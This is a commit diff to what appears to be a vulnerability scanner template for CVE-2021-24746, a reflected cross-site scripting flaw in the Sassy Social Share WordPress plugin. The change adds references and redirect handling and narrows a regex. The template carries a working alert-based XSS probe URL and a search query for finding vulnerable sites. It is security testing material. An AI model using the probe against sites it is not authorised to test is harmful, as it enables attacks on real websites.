Update CVE-2021-24746.yaml

2022-04-06 09:55:48 +05:30 · 2022-04-06 09:55:48 +05:30 · a0e7094664
parent 68f4159393
commit a0e7094664
1 changed files with 7 additions and 3 deletions
--- a/cves/2021/CVE-2021-24746.yaml
+++ b/cves/2021/CVE-2021-24746.yaml
@ -5,10 +5,12 @@ info:
  author: Supras
  severity: medium
  description: WP plugin Sassy Social Share < 3.3.40 - Reflected Cross-Site Scripting
-  reference: https://wpscan.com/vulnerability/99f4fb32-e312-4059-adaf-f4cbaa92d4fa
+  reference:
+    - https://wpscan.com/vulnerability/99f4fb32-e312-4059-adaf-f4cbaa92d4fa
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24746
  metadata:
    google-query: 'inurl:"/wp-content/plugins/sassy-social-share"'
-  tags: cve,cve2021,wordpress,wp-plugin,xss
+  tags: cve,cve2021,wordpress,wp-plugin,xss,wp

 requests:
  - method: GET
@ -16,6 +18,8 @@ requests:
      - "{{BaseURL}}/wp-json/wp/v2/posts"
      - "{{BaseURL}}/{{slug}}/?a&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;"

+    redirects: true
+    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: word
@ -39,4 +43,4 @@ requests:
        internal: true
        group: 1
        regex:
-          - '"slug":"(.*)","status'
+          - '"slug":"([_a-z-A-Z0-9]+)",'